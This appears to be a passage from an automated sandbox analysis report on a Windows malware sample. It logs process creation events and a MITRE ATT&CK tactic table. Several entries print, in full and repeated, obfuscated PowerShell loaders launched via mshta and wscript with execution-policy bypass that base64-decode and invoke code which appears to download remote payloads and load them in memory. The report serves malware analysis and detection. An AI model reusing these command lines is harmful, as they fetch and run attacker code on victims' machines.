            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angelJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting
            Valid Accounts121
            Command and Scripting Interpreter
            121
            Scripting
            111
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote Services1
